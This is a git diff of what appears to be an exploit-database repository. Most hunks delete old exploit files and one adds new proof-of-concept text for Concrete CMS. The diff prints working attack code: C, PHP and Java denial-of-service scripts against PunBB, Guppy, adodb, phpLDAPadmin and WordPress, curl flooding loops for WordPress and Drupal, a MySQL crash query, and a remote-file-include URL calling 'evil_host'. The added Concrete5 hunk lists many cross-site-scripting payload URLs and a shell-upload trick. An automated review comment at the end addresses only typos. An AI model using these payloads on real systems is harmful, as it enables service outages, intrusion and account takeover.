exit(-1); - } - sprintf(HTTP_PACK, "POST %sregister.php?action=register HTTP/1.1\n" - "Host: %s\n" - "User-Agent: Mozilla/5.0 Gecko/20050511 Firefox/1.0.4\n" - "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n" - "Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3\n" - "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n" - "Keep-Alive: 300\n" - "Proxy-Connection: keep-alive\n" - "Referer: http://%s%sregister.php\n" - "Content-Type: application/x-www-form-urlencoded\n", path, DNS, DNS, path); - - sprintf(HTTP_POST, "form_sent=1&req_username=%d__NsT&req_password1=flood&req_password2=flood&" - "req_email1=%d_peace@NsT.net&timezone=-10&email_setting=1", var, var); - - sprintf(HTTP_MPCK, "Content-Length: %d\n\n", strlen(HTTP_POST)); - - strcat(HTTP_PACK, HTTP_MPCK); - strcat(HTTP_PACK, HTTP_POST); - send(v_sck, HTTP_PACK, strlen(HTTP_PACK), 0); - - 
free(HTTP_PACK); - free(HTTP_MPCK); - free(HTTP_POST); - return; -} - -void _perror(char* msg) -{ - perror(msg); - fflush(stdout); - exit(-1); -} - -void HowTo(char* program) -{ - fprintf(stderr, "%s \n", program); - fprintf(stderr, "f.e: ./NsT-XplPunbb www.victim.com 2.0.0.6 /punbb/\n"); - fprintf(stderr, "#################################################"); - exit(0); -} - -// milw0rm.com [2006-02-20] diff --git a/platforms/php/webapps/1573.php b/platforms/php/webapps/1573.php deleted file mode 100755 index 9bbc7c608..000000000 --- a/platforms/php/webapps/1573.php +++ /dev/null @@ -1,232 +0,0 @@ -# Change line 30 s/htp/http if you would like to see the logo. /str0ke - - - - -Guppy <= 4.5.11 Remote DOS Exploit - - - - -

Guppy <= 4.5.11 Remote DOS -Exploit

-

by trueend5

-

Computer Security Science Researchers -Institute

- -

KAPDA

-

-
- - - - - - -
-
-

* hostname (ex:www.sitename.com)

-

* path (ex: - /guppy/ - or just / )

-

how many document - do you want to destroy (default is 100)

-

  This option works when magic_quotes_gpc is Off

-

specify a port  - (default is 80)

-

send exploit - through an HTTP proxy (ip:port)

-

   - * fields are required

-

-----------------------------------------------------------------------------------------------

- -

-
-
-'; -function show($headeri) -{ - $ii=0;$ji=0;$ki=0;$ci=0; - echo ''; - while ($ii <= strlen($headeri)-1){ - $datai=dechex(ord($headeri[$ii])); - if ($ji==16) { - $ji=0; - $ci++; - echo ""; - for ($li=0; $li<=15; $li++) { - echo ""; - } - $ki=$ki+16; - echo ""; - } - if (strlen($datai)==1) { - echo ""; - } - else { - echo " "; - } - $ii++;$ji++; - } - for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) { - echo ""; - } - for ($li=$ci*16; $li<=strlen($headeri); $li++) { - echo ""; - } - echo "
  ".$headeri[$li+$ki]."
0".$datai."".$datai."  ".$headeri[$li]."
"; -} - -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; - -function sendpacket() -{ - global $proxy, $host, $port, $packet, $html, $proxy_regex; - $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); - if ($socket < 0) { - echo "socket_create() failed: reason: " . socket_strerror($socket) . "
"; - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) {echo 'Not a valid proxy'; - die; - } - echo "OK.
"; - echo "Attempting to connect to ".$host." on port ".$port."...
"; - if ($proxy=='') { - $result = socket_connect($socket, $host, $port); - } - else { - $parts =explode(':',$proxy); - echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; - $result = socket_connect($socket, $parts[0],$parts[1]); - } - if ($result < 0) { - echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "

"; - } - else { - echo "OK.

"; - $html= ''; - socket_write($socket, $packet, strlen($packet)); - echo "Reading response:
"; - while ($out= socket_read($socket, 2048)) {$html.=$out;} - echo nl2br(htmlentities($html)); - echo "Closing socket..."; - socket_close($socket); - } - } -} - -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.htmlentities($host); die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy';die; - } - $parts=explode(':',$proxy); - echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); -} - -$host=$_POST[host]; -$path=$_POST[path]; -$port=$_POST[port]; -$num=$_POST[num]; - -if (($host<>'') and ($path<>'')) -{ - $port=intval(trim($port)); - $num=intval(trim($num)); - if ($port=='') {$port=80;} - if ($num=='') {$num=100;} - if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {die('Error... check the path!');} - if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - $host=str_replace("\r\n","",$host); - $path=str_replace("\r\n","",$path); - echo ' Try to see if magic_quotes_gpc is enable! ...'; - $packet="GET ".$p."mobile/dwnld.php?pg=./%2E./test.inc%00"." HTTP/1.1\r\n"; - $packet.="User-Agent: Shareaza v1.x.x.xx\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="Connection: Close\r\n\r\n"; - show($packet); - sendpacketii($packet); - $test='http://'.$host.$path.'data/test.inc'; - if (!include("$test")) { - echo'It seems magic_quotes_gpc is On. Trying STEP 2 ...'; -} - else {echo'magic_quotes_gpc is disable. STEP 1:'; - for ($n = 1; $n <= $num; $n++) { - $packet="GET ".$p."mobile/dwnld.php?pg=./%2E./doc".$n.".inc%00"." 
HTTP/1.1\r\n"; - $packet.="User-Agent: Shareaza v1.x.x.xx\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="Connection: Close\r\n\r\n"; - show($packet); - sendpacketii($packet); - } -} - echo' STEP 2:'; - for ($n = 1; $n <= 29; $n++) { - if ($n==1) {$str='ar';} if ($n==2) {$str='counter';} if ($n==3) {$str='dn';} if ($n==4) {$str='docid';} if ($n==5) {$str='fa';} - if ($n==6) {$str='fr';} if ($n==7) {$str='frcat';} if ($n==8) {$str='frcount';} if ($n==9) {$str='frth';} if ($n==10) {$str='ippoll';} - if ($n==11) {$str='ipstats';} if ($n==12) {$str='li';} if ($n==13) {$str='log_date';} if ($n==14) {$str='log_files';} - if ($n==15) {$str='log_stats';} if ($n==16) {$str='logbook';} if ($n==17) {$str='logd';} if ($n==18) {$str='logh';} - if ($n==19) {$str='logm';} if ($n==20) {$str='logp';} if ($n==21) {$str='logy';} if ($n==22) {$str='nextid';} - if ($n==23) {$str='nwlist';} if ($n==24) {$str='ph';} if ($n==25) {$str='poll';} if ($n==26) {$str='ra';} - if ($n==27) {$str='rs';} if ($n==28) {$str='stats';} if ($n==29) {$str='statsbk';} - $packet="GET ".$p."mobile/dwnld.php?pg=./%2E./$str"." HTTP/1.1\r\n"; - $packet.="User-Agent: SnoopRob/x.x\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="Connection: Close\r\n\r\n"; - show($packet); - sendpacketii($packet); - } - $test2='http://'.$host.$path.'data/stats.dtb'; - include("$test2"); - if (eregi("1",$html)) {echo "Exploit succeeded"; } - else {echo "Exploit failed...";} -} -else -{echo "IMPORTANT NOTICE: This POC is just for educational purposes, Please Do not use it against external websites
-You are responsible for any damage that .... ";} - -?> - -# milw0rm.com [2006-03-10] diff --git a/platforms/php/webapps/1651.php b/platforms/php/webapps/1651.php deleted file mode 100755 index 1f664cdb9..000000000 --- a/platforms/php/webapps/1651.php +++ /dev/null @@ -1,107 +0,0 @@ -#!/usr/bin/php -q -d short_open_tag=on - 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port."\r\n"; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...'; - } - } - fputs($ock,$packet); - fclose($ock); -} - -$host=$argv[1];$path=$argv[2];$redo=$argv[3]; -$port=80;$proxy=""; -for ($i=4; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} - -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - -for ($i=1; $i<=$redo; $i++) -{ -$packet ="GET ".$p."include/adodb/tests/tmssql.php?do=closelog HTTP/1.0\r\n"; -$packet.="User-Agent: Googlebot/2.1\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -sendpacketii($packet); -echo $packet; -} -?> - -# milw0rm.com [2006-04-09] 
diff --git a/platforms/php/webapps/18023.java b/platforms/php/webapps/18023.java
deleted file mode 100755
index 671723a6c..000000000
--- a/platforms/php/webapps/18023.java
+++ /dev/null
@@ -1,138 +0,0 @@ -/** - * Exploit Title: phpLDAPadmin 0.9.4b DoS - * Google Dork: "phpLDAPadmin - 0.9.4b" - * Date: 2011-10-23 - * Author: Alguien - * Software Link: http://sourceforge.net/projects/phpldapadmin/files/phpldapadmin/0.9.4b/ - * Version: 0.9.4b - * Tested on: Red Hat - * CVE : - - * - * Compilation: - * ------------ - * $ javac phpldos.java - * - * Usage: - * ------ - * $ java phpldos - * - * Example: - * -------- - * $ java phpldos www.example.com /phpldapadmin/ 10 - * - * Explanation: - * ------------ - * The file "common.php" is vulnerable to LFI through the "Accept-Language" - * HTTP header. - * - * if( isset( $_SERVER['HTTP_ACCEPT_LANGUAGE'] ) ) { - * // get the languages which are spetcified in the HTTP header - * $HTTP_LANGS1 = preg_split ("/[;,]+/", $_SERVER['HTTP_ACCEPT_LANGUAGE'] ); - * $HTTP_LANGS2 = preg_split ("/[;,]+/", $_SERVER['HTTP_ACCEPT_LANGUAGE'] ); - * foreach( $HTTP_LANGS2 as $key => $value ) { - * $value=preg_split ("/[-]+/", $value ); - * $HTTP_LANGS2[$key]=$value[0]; - * } - * - * $HTTP_LANGS = array_merge ($HTTP_LANGS1, $HTTP_LANGS2); - * foreach( $HTTP_LANGS as $HTTP_LANG) { - * // try to grab one after the other the language file - * if( file_exists( realpath( "lang/recoded/$HTTP_LANG.php" ) ) && - * is_readable( realpath( "lang/recoded/$HTTP_LANG.php" ) ) ) { - * ob_start(); - * include realpath( "lang/recoded/$HTTP_LANG.php" ); - * ob_end_clean(); - * break; - * } - * } - * } - * - * This exploit sends "../../common" in the Accept-Language header in order to - * generate a recursive inclusions and cause a denial of service via resource - * exhaustion. 
- * - * GET /phpldapadmin/common.php HTTP/1.1\r\n - * Host: www.example.com\r\n - * Accept-Language: ../../common\r\n - * Connection: close\r\n - * \r\n - * - */ -import java.io.PrintStream; -import java.net.InetSocketAddress; -import java.net.Socket; - -class phpldos implements Runnable { - - public static final int HTTP_PORT = 80; - public static final int TIMEOUT = 10000; - private static String host; - private static String path; - private Socket sk; - private PrintStream ps; - - public void run() { - while (true) { - if (!open_connection()) { - System.out.println("[+] Mission complete. Server is down };]"); - break; - } - send_attack(); - try { - ps.close(); - sk.close(); - } catch (Exception e) { - // D'oh! - } - } - } - - private boolean open_connection() { - try { - sk = new Socket(); - sk.connect(new InetSocketAddress(host, HTTP_PORT), TIMEOUT); - ps = new PrintStream(sk.getOutputStream()); - } catch (Exception e) { - return false; - } - return true; - } - - private void send_attack() { - try { - String message = "" - + "GET " + path + "common.php HTTP/1.1\r\n" - + "Host: " + host + "\r\n" - + "Accept-Language: ../../common\r\n" - + "Connection: close\r\n" - + "\r\n"; - ps.print(message); - } catch (Exception e) { - // D'oh! - } - } - - public static void main(String[] args) { - if (args.length != 3) { - usage(); - } - host = args[0]; - path = args[1]; - int threads = Integer.parseInt(args[2]); - System.out.println("[+] Attacking with " + threads + " threads."); - for (int i = 0; i < threads; i++) { - new Thread(new phpldos()).start(); - } - } - - public static void usage() { - System.out.print( - "###########################################################\n" - + "# phpLDAPadmin DoS #\n" - + "# by: Alguien - http://alguienenlafisi.blogspot.com #\n" - + "###########################################################\n" - + "Syntax : java phpldos \n" - + "Example : java phpldos www.example.com /phpldapadmin/ 10\n\n"); - System.exit(1); - } -} 
diff --git a/platforms/php/webapps/21428.txt b/platforms/php/webapps/21428.txt
deleted file mode 100755
index 049dd0691..000000000
--- a/platforms/php/webapps/21428.txt
+++ /dev/null
@@ -1,12 +0,0 @@
-source: http://www.securityfocus.com/bid/4635/info
-
-Messagerie is a web message board application maintained by La Basse.
-
-An issue has been discovered in Messagerie, which could allow an attacker to delete arbitrary user accounts.
-
-Reportedly, submitting a specially crafted URL will successfully remove user accounts.
-
-It should be noted that known usernames of the system is required.
-
-
-http://www.host.com/supp_membre.php?choix_membre_supp=polom
\ No newline at end of file
diff --git a/platforms/php/webapps/22110.txt b/platforms/php/webapps/22110.txt
deleted file mode 100755
index d8423d6b9..000000000
--- a/platforms/php/webapps/22110.txt
+++ /dev/null
@@ -1,7 +0,0 @@
-source: http://www.securityfocus.com/bid/6465/info
-
-A denial of service vulnerability has been reported for the modules.php script used by PHP-Nuke. The vulnerability occurs because the modules.php script does not properly validate some URI parameters.
-
-An attacker can exploit this vulnerability by modifying certain parameters when making a request for the modules.php script. This will prevent visitors to the site hosting PHP-Nuke from creating a new account thereby leading to a denial of service vulnerability.
-
-http://target.com/modules.php?name=Your_Account&op=userinfo&uname=
\ No newline at end of file
diff --git a/platforms/php/webapps/22494.txt b/platforms/php/webapps/22494.txt
deleted file mode 100755
index baae98c07..000000000
--- a/platforms/php/webapps/22494.txt
+++ /dev/null
@@ -1,7 +0,0 @@
-source: http://www.securityfocus.com/bid/7351/info
-
-It has been reported that an attacker may trigger a denial of service condition in osCommerce application. If malicious URI parameters are passed to several of the osCommerce PHP pages, the mySQL and web server hosting osCommerce reportedly becomes unstable, possibly resulting in a denial of service condition.
-
-It should be noted that although osCommerce version 2.2cvs was reported vulnerable, previous versions may also be affected.
-
-product_info.php?products_id=[large amount of random content]
\ No newline at end of file
diff --git a/platforms/php/webapps/22660.txt b/platforms/php/webapps/22660.txt
deleted file mode 100755
index b4fa0da52..000000000
--- a/platforms/php/webapps/22660.txt
+++ /dev/null
@@ -1,6 +0,0 @@
-source: http://www.securityfocus.com/bid/7702/info
-
-some submissions to the rating system. Because of this, a remote attacker may be able to submit a string that causes a denial of service to legitmate users.
-
-
-http://www.example.com/modules.php?op=modload&name=Downloads&file=index&req=addrating&ratinglid=[DOWNLOAD ID]&ratinguser=[REMOTE USER]&ratinghost_name=[REMOTE HOST ;-)]&rating=[YOUR RANDOM CONTENT]
\ No newline at end of file
diff --git a/platforms/php/webapps/23311.txt b/platforms/php/webapps/23311.txt
deleted file mode 100755
index b6986ff64..000000000
--- a/platforms/php/webapps/23311.txt
+++ /dev/null
@@ -1,11 +0,0 @@
-source: http://www.securityfocus.com/bid/8930/info
-
-It has been reported that E107 may be prone to a denial of service vulnerability. The issue has been reported to exist due to improper handling of user-supplied data in the form of HTML or script code to the 'Name:' field of Chatbox.php script. This issue may cause the software to behave in an unstable manner leading to a crash.
-
-Successful exploitation of this issue may allow an attacker to cause the software to crash or hang.
-
-It should be noted that although this vulnerability has been reported to affect E107 versions 0.545 and 0.603, other versions might also be affected.
-
-In the Name inputbox of the Chatbox type:
-
-
\ No newline at end of file
diff --git a/platforms/php/webapps/29874.txt b/platforms/php/webapps/29874.txt
deleted file mode 100755
index 810bbef17..000000000
--- a/platforms/php/webapps/29874.txt
+++ /dev/null
@@ -1,9 +0,0 @@
-source: http://www.securityfocus.com/bid/23580/info
-
-PHP Turbulence is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
-
-Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
-
-This issue affects PHP Turbulence 0.0.1 alpha; other versions may also be affected.
-
-http://www.example.com/user/turbulence.php?GLOBALS[tcore]=http://evil_host/evil_script.txt?
\ No newline at end of file
diff --git a/platforms/php/webapps/29980.txt b/platforms/php/webapps/29980.txt
deleted file mode 100755
index ea852b0f1..000000000
--- a/platforms/php/webapps/29980.txt
+++ /dev/null
@@ -1,9 +0,0 @@
-source: http://www.securityfocus.com/bid/23874/info
-
-Campsite is prone to multiple remote file-include vulnerabilities.
-
-Exploiting this issue allows remote attackers to execute code in the context of the webserver.
-
-This issue affects Campsite 2.6.1. Earlier versions may also be affected.
-
-http://www.example.com/classes/IPAccess.php?g_DocumentRoot=shell.txt?
\ No newline at end of file
diff --git a/platforms/php/webapps/29987.txt b/platforms/php/webapps/29987.txt
deleted file mode 100755
index 2e806cafe..000000000
--- a/platforms/php/webapps/29987.txt
+++ /dev/null
@@ -1,9 +0,0 @@
-source: http://www.securityfocus.com/bid/23874/info
-
-Campsite is prone to multiple remote file-include vulnerabilities.
-
-Exploiting this issue allows remote attackers to execute code in the context of the webserver.
-
-This issue affects Campsite 2.6.1. Earlier versions may also be affected.
-
-http://www.example.com/classes/Publication.php?g_DocumentRoot=shell.txt?
\ No newline at end of file
diff --git a/platforms/php/webapps/30753.txt b/platforms/php/webapps/30753.txt
deleted file mode 100755
index ff80a3ab7..000000000
--- a/platforms/php/webapps/30753.txt
+++ /dev/null
@@ -1,9 +0,0 @@
-source: http://www.securityfocus.com/bid/26410/info
-
-AutoIndex PHP Script is prone to a remote denial-of-service vulnerability because the application fails to properly handle unexpected input.
-
-Successfully exploiting this issue allows remote attackers to consume excessive CPU resources, potentially denying service to legitimate users.
-
-AutoIndex PHP Script 2.2.2 and 2.2.3 are vulnerable to this issue; prior versions may also be affected.
-
-http://www.example.com/AutoIndex/index.php?dir=%00
\ No newline at end of file
diff --git a/platforms/php/webapps/34505.txt b/platforms/php/webapps/34505.txt
deleted file mode 100755
index 562a10a3e..000000000
--- a/platforms/php/webapps/34505.txt
+++ /dev/null
@@ -1,14 +0,0 @@
-source: http://www.securityfocus.com/bid/42598/info
-
-MySQL is prone to a denial-of-service vulnerability.
-
-An attacker can exploit these issues to crash the database, denying access to legitimate users.
-
-This issues affect versions prior to MySQL 5.1.49.
-
-NOTE: This issue was previously covered in BID 42598 (Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities) but has been given its own record to better document it.
-
-mysql> SET storage_engine=MYISAM;
-
-mysql> CREATE TEMPORARY TABLE mk_upgrade AS SELECT IF( NULL IS NOT NULL, NULL
-, NULL) ; drop table mk_upgrade;
diff --git a/platforms/php/webapps/35413.php b/platforms/php/webapps/35413.php
deleted file mode 100755
index 74595ec5c..000000000
--- a/platforms/php/webapps/35413.php
+++ /dev/null
@@ -1,67 +0,0 @@
- $argv[2],
- 'pwd' => str_repeat("A",1000000),
- 'redirect_to' => $argv[1] . "/wp-admin/",
- 'reauth' => 1,
- 'testcookie' => '1',
- 'wp-submit' => "Log%20In");
-
- $cookieFiles = "cookie.txt";
-
- curl_setopt_array($ch, array(
- CURLOPT_HEADER => 1,
- CURLOPT_USERAGENT => "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6",
- CURLOPT_REFERER => $argv[1] . "/wp-admin/",
- CURLOPT_COOKIEJAR => $cookieFiles,
- CURLOPT_COOKIESESSION => true,
- CURLOPT_URL => $argv[1] . '/wp-login.php',
- CURLOPT_RETURNTRANSFER => true,
- CURLOPT_POST => true,
- CURLOPT_POSTFIELDS => $postData,
- CURLOPT_FOLLOWLOCATION => true));
-
- curl_multi_add_handle($multi, $ch);
-
- $channels[$x] = $ch;
-}
-
-$active = null;
-
-do {
- $mrc = curl_multi_exec($multi, $active);
-} while ($mrc == CURLM_CALL_MULTI_PERFORM);
-
-while ($active && $mrc == CURLM_OK) {
- do {
-
- $mrc = curl_multi_exec($multi, $active);
- } while ($mrc == CURLM_CALL_MULTI_PERFORM);
-}
-
-foreach ($channels as $channel) {
- curl_multi_remove_handle($multi, $channel);
-}
-
-curl_multi_close($multi);
-echo ".";
-} while (1==1);
-
-?>
-
diff --git a/platforms/php/webapps/35414.txt b/platforms/php/webapps/35414.txt
deleted file mode 100755
index ad3cbcdc0..000000000
--- a/platforms/php/webapps/35414.txt
+++ /dev/null
@@ -1,52 +0,0 @@
-====================================================================
-DESCRIPTION:
-====================================================================
-A vulnerability present in Wordpress < 4.0.1 allows an
-attacker to send specially crafted requests resulting in CPU and memory
-exhaustion. This may lead to the site becoming unavailable or
-unresponsive (denial of service).
-
-====================================================================
-Time Line:
-====================================================================
-
-November 20, 2014 - A Wordpress security update and the security
-advisory is published.
-
-====================================================================
-Proof of Concept:
-====================================================================
-Generate a pyaload and try with a valid user:
-
-echo -n "name=admin&pass=" > valid_user_payload && printf "%s"
-{1..1000000} >> valid_user_payload && echo -n "&op=Log
-in&form_id=user_login" >> valid_user_payload
-
-Perform a Dos with a valid user:
-
-for i in `seq 1 150`; do (curl --data @valid_user_payload
-http://yoursite/wordpress/wp-login.php --silent > /dev/null &); sleep
-0.25; done
-
-====================================================================
-Authors:
-====================================================================
-
--- Javer Nieto -- http://www.behindthefirewalls.com
--- Andres Rojas -- http://www.devconsole.info
-
-====================================================================
-References:
-====================================================================
-
-* https://wordpress.org/news/2014/11/wordpress-4-0-1/
-
-* https://www.drupal.org/SA-CORE-2014-006
-
-*
-http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html
-
-*
-http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html
-
-* http://www.devconsole.info/?p=1050
diff --git a/platforms/php/webapps/35415.txt b/platforms/php/webapps/35415.txt
deleted file mode 100755
index 18b051111..000000000
--- a/platforms/php/webapps/35415.txt
+++ /dev/null
@@ -1,53 +0,0 @@
-====================================================================
-DESCRIPTION:
-====================================================================
-A vulnerability present in Drupal < 7.34 allows an attacker to send
-specially crafted requests resulting in CPU and memory exhaustion. This
-may lead to the site becoming unavailable or unresponsive (denial of
-service).
-
-====================================================================
-Time Line:
-====================================================================
-
-November 19, 2014 - A Drupal security update and the security advisory
-is published.
-
-====================================================================
-Proof of Concept:
-====================================================================
-
-Generate a pyaload and try with a valid user:
-
-echo -n "name=admin&pass=" > valid_user_payload && printf "%s"
-{1..1000000} >> valid_user_payload && echo -n "&op=Log
-in&form_id=user_login" >> valid_user_payload
-
-Perform a Dos with a valid user:
-
-for i in `seq 1 150`; do (curl --data @valid_user_payload
-http://yoursite/drupal/?q=user --silent > /dev/null &); sleep 0.5; done
-
-
-====================================================================
-Authors:
-====================================================================
-
--- Javer Nieto -- http://www.behindthefirewalls.com
--- Andres Rojas -- http://www.devconsole.info
-
-====================================================================
-References:
-====================================================================
-
-* https://wordpress.org/news/2014/11/wordpress-4-0-1/
-
-* https://www.drupal.org/SA-CORE-2014-006
-
-*
-http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html
-
-*
-http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html
-
-* http://www.devconsole.info/?p=1050
diff --git a/platforms/php/webapps/37225.pl b/platforms/php/webapps/37225.pl
index 6473e6926..889e04059 100755
--- a/platforms/php/webapps/37225.pl
+++ b/platforms/php/webapps/37225.pl
@@ -12,6 +12,76 @@ An attacker may leverage these issues to cause denial-of-service conditions or t
 Concrete CMS versions 5.5 and 5.5.21 are vulnerable.
+
+
+
+
+Cross Site Scripting:
+
+1) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/sitemap_search_selector?select_mode=">
+
+2) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/import?ocID=">&searchInstance=file1337335625
+
+3) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/import?ocID=13&searchInstance=">
+3A)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=123&ocID=123&searchType=&searchInstance=&searchInstance=&ccm_order_by=fvDateAdded&ccm_order_dir=asc&searchType=123 &searchInstance=">
+www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=123&ocID=123&searchType=&searchInstance=">
+
+4)(onmouseovervent) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=" onmouseover="alert(1)"&fKeywords=zssds&fsID[]=-1&numResults=10&searchField=&selectedSearchField[]=
+
+4A)(without onmouseover event)
+http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=">&fKeywords=zssds&fsID[]=-1&numResults=10&searchField=&selectedSearchField[]=
+
+5)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/sitemap_search_selector?select_mode=move_copy_delete&cID=">
+
+6) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/edit?searchInstance=');&fID=7
+&fid=VALID_ID_OF_IAMGE
+
+7)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/add_to?searchInstance=">&fID=owned
+
+8)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/replace?searchInstance=">&fID=4
+
+9)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/bulk_properties/?&fID[]=17&uploaded=true&searchInstance=">
+&fid=VALID_ID_OF_IAMGE
+
+10)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/permissions?searchInstance=">&fID=owned
+
+11)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=">&node=owned&display_mode=full&select_mode=&selectedPageID=
+
+11A)
+http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=owned&node=">&display_mode=full&select_mode=&selectedPageID=
+
+11B)
+http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=owned&node=owned&display_mode=">&select_mode=&selectedPageID=
+
+11C)
+http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=owned&node=owned&display_mode=owned&select_mode=owned&selectedPageID=">
+
+11D)
+http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=owned&node=owned&display_mode=owned&select_mode=">&selectedPageID=owned
+(All parameters goes to page source without any sanitization
+validation)
+
+12)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_dialog?ocID=">&search=1
+
+13)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/customize_search_columns?searchInstance=">
+
+
+
+Shell upload:
+
+#### p0c 1 [ Upload File via FlashUploader ] ###==>
+
+http://www.example.com/concrete/flash/thumbnail_editor_2.swf
+http://www.example.com/concrete/flash/thumbnail_editor_3.swf +http://www.example.com/concrete/flash/swfupload/swfupload.swf +http://www.example.com/concrete/flash/uploader/uploader.swf + +# Upload File/Shell Inj3ct0r.php;.gif + + + + +DOS: + #### p0c 2 [ DDos with RPC 'using simple PERL script]===> #!/usr/bin/perl diff --git a/platforms/php/webapps/6481.c b/platforms/php/webapps/6481.c deleted file mode 100755 index a1b000147..000000000 --- a/platforms/php/webapps/6481.c +++ /dev/null 
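Review bot: The added URLs all embed the version path `concrete5.5.2.1`, while the context line directly above them says `Concrete CMS versions 5.5 and 5.5.21 are vulnerable`; one of the two is presumably a typo, and a reader cannot tell which release the new findings were checked against, so a single line such as `Tested on: Concrete CMS <VERSION>` before the `Cross Site Scripting:` heading would settle it. Two placeholders in the new lines are misspelled, `VALID_ID_OF_IAMGE` (items 6 and 9) and `(onmouseovervent)` (item 4), and `All parameters goes to page source` should read `All parameters go to the page source`. The new text is inserted before the `#!/usr/bin/perl` context line, so the non-Perl preamble of this `.pl` file grows; that preamble starts outside the hunk.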
